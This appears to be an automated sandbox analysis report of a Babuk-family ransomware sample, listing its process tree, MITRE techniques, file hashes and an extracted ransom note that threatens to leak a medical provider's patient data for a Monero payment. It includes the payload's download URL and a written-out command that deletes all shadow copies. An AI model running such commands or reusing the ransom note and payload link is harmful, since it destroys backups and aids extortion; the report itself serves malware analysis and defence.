Analysis

  • max time kernel
    229s
  • max time network
    192s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    23-01-2022 12:04

General

  • Target

    https://transfer.sh/45dIVs/worstgeneration.exe

Score
10/10

Malware Config

Extracted

Path

C:\How To Restore Your Files.txt

Ransom Note
You are probably wondering why you are receiving a message from me. Yesterday, duncanregional.com got breached. You are probably not aware, but over the past few days we have been exfiltrating all of your data that we could get our hands on. We took over 150GB data + patient userdata from dba servers. What happened to your files? Your network was been penetrated. All of your files were encrypted using AES-256-CTR with ChaCha8 Cipher. WARNING: Don't try to decrypt your files, shadow copies were removed, recovery methods can lead to the impossibility of recovery of the certain files. We exclusively have decryption software for your situation, no decryption software is available in the public. Pay 60,000 (USD) in XMR (Monero) to this address: 4BExj4Z7n73316oWSd6k3Wj7A12PFVUSeHoobSPpaCJVdH6Z1oRBBssemrpwW5GyRt7xi3SQCeJzUa1uFoWWNySYCxoHv13 How do you buy XMR? https://bisq.network/ to buy XMR using fiat. Alternatively use a Cryptocurrency exchange to buy XMR: https://www.kraken.com/ Use this guide: https://www.getmonero.org/ After sending the specified amount to our wallet we will provide you with the decryption keys to unlock your files. If you do not respond (24 hour deadline, starting now), or we do not receive a response from you we will start the data to our potential buyers, and leak a partial, All of your clients (patients / employers) will be informed and given proof that their data has been compromised and publish everything in a public way in multiple places and outlets to get more customers interested in buying the data and also reporting the availability of this data to the appropriate news platforms. Contact: telegram: @redeyeg0d email: yourd34d@ctemplar.com
Emails

yourd34d@ctemplar.com

URLs

https://bisq.network/

https://www.getmonero.org/

Signatures

  • Babuk Locker

    RaaS first seen in 2021 initially called Vasa Locker.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://transfer.sh/45dIVs/worstgeneration.exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2680 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:3700
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
        3⤵
        • Executes dropped EXE
        • Modifies extensions of user files
        • Enumerates connected drives
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1312
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1468
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:1736
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3716
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:2540
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2948

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

File Deletion

2
T1107

Modify Registry

2
T1112

Discovery

Query Registry

1
T1012

Peripheral Device Discovery

1
T1120

System Information Discovery

2
T1082

Impact

Inhibit System Recovery

2
T1490

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
    MD5

    54e9306f95f32e50ccd58af19753d929

    SHA1

    eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

    SHA256

    45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

    SHA512

    8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\321B11C090EF3178E0E67AD67E9B2AD8
    MD5

    8fcc480b7637c35cffb3608663183dd6

    SHA1

    aa6519a73b6b5eb44d997614b6f6b10525ecfcd1

    SHA256

    8c778382b926551185c57021eb754f7cb15a0d3c6cf03e470772e3c90e248837

    SHA512

    ee3c1028c520407c60a97a296f5591c2195efd7689624b188d25ab7c85e186d76e630ab4d90824604aa882c50c6aac1369eee8a28532239658a5cb479e365854

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    2df573656498a29efb53256939846988

    SHA1

    b93632284eecac96e7ad12be1df82680f2b94fab

    SHA256

    1aa65f094d6c2a25d5ad0a56274d3a3d57ef18add7d2e9d9f2ec2d7e97f9705e

    SHA512

    f623eed3bc6e75ac53b42ff1f1f6cc20ef139db5d3a511a3c8323a0a011ae5088d6ac7e688a3a5dbbe00a730d4942d644da770d3e976deada83f8199fc8c325f

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
    MD5

    1056db3a980e3851f0fdd2f7e3b3fe90

    SHA1

    933545daa8e2105dcf38d8e3c0c37325fa7ec722

    SHA256

    8691aa0470653559adea4e95e41f719398d6038ca70c50fb77dfc29bb95ea5d4

    SHA512

    754bbc989046bb72c871a9cf11b6e91cf2561383a6ed3089269c679120b149161558a443880fef35374d6421b17921129d6ed5104eb026a6075e40399a0574bd

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\321B11C090EF3178E0E67AD67E9B2AD8
    MD5

    9bf8a3419b6f97d69ae2a18feb9b2858

    SHA1

    45a6e4e5f349dc61932a20c55250fb2fc5c64ec5

    SHA256

    07b2ae6dca87f05a4ae523c06bd7f96bd5c1b1572e7f9ebd8f6d96b527f1b411

    SHA512

    eaa54dced480f40a97a06656b588a33e48463646228452a22ad47dab291e13d17f20c4b20b8974c62aa2040fb5c92b9d0231beb927479f9e39059f2b91b3e7c6

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    c1267c39c9a83c983aa8d24131f29a65

    SHA1

    05780e9bb1385a2ceb07c325243ec445e1091086

    SHA256

    8e48b1f50f8bb3df2c3f68533ece697f0e276a216ffdb141c65221106afa73b9

    SHA512

    faf6835222531b39709bf6ec6659408db6d11cb5bfc6607b8599c83f5ab798103f96762ac052a2c24dd9eb3ffedac2775cb103877cd5b7ef009c402a126cec92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe
    MD5

    4dc689389054b8aae01c162fb7fec051

    SHA1

    fd4356fd980f837a813515321fe5f54d5625258b

    SHA256

    e69149c02a0f24731559d5bec3c1bdbe916cd2829751025845fe48ea01966b82

    SHA512

    e924f802421f24447ace77bce1ff7f24f11ea852ae00cc624d17bec6f6e675eb258923cd7897f5307c3346b1f08d9cea978dd980344c8905b14b1b88631895c1

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6KXLFSUN\worstgeneration.exe.oi1aw51.partial
    MD5

    4dc689389054b8aae01c162fb7fec051

    SHA1

    fd4356fd980f837a813515321fe5f54d5625258b

    SHA256

    e69149c02a0f24731559d5bec3c1bdbe916cd2829751025845fe48ea01966b82

    SHA512

    e924f802421f24447ace77bce1ff7f24f11ea852ae00cc624d17bec6f6e675eb258923cd7897f5307c3346b1f08d9cea978dd980344c8905b14b1b88631895c1

  • C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
    MD5

    6a673bfc3b67ae9782cb31af2f234c68

    SHA1

    7544e89566d91e84e3cd437b9a073e5f6b56566e

    SHA256

    978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

    SHA512

    72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

  • memory/1156-127-0x0000000004AF0000-0x0000000004B60000-memory.dmp
    Filesize

    448KB

  • memory/1156-131-0x0000000004AF0000-0x0000000004B60000-memory.dmp
    Filesize

    448KB

  • memory/1156-126-0x0000000004BB0000-0x0000000004BC6000-memory.dmp
    Filesize

    88KB

  • memory/1156-124-0x0000000004CC0000-0x0000000004D5C000-memory.dmp
    Filesize

    624KB

  • memory/1156-128-0x0000000005590000-0x000000000559A000-memory.dmp
    Filesize

    40KB

  • memory/1156-123-0x0000000004C20000-0x0000000004CB2000-memory.dmp
    Filesize

    584KB

  • memory/1156-122-0x0000000005080000-0x000000000557E000-memory.dmp
    Filesize

    5.0MB

  • memory/1156-125-0x0000000004B80000-0x0000000004BB2000-memory.dmp
    Filesize

    200KB

  • memory/1156-132-0x0000000008E10000-0x0000000008E2A000-memory.dmp
    Filesize

    104KB

  • memory/1156-133-0x0000000004E60000-0x0000000004E66000-memory.dmp
    Filesize

    24KB

  • memory/1156-134-0x0000000009410000-0x0000000009760000-memory.dmp
    Filesize

    3.3MB

  • memory/1156-135-0x0000000004F50000-0x0000000004F72000-memory.dmp
    Filesize

    136KB

  • memory/1156-121-0x00000000001F0000-0x000000000025C000-memory.dmp
    Filesize

    432KB

  • memory/1312-136-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize

    96KB

  • memory/1312-138-0x0000000000400000-0x0000000000418000-memory.dmp
    Filesize

    96KB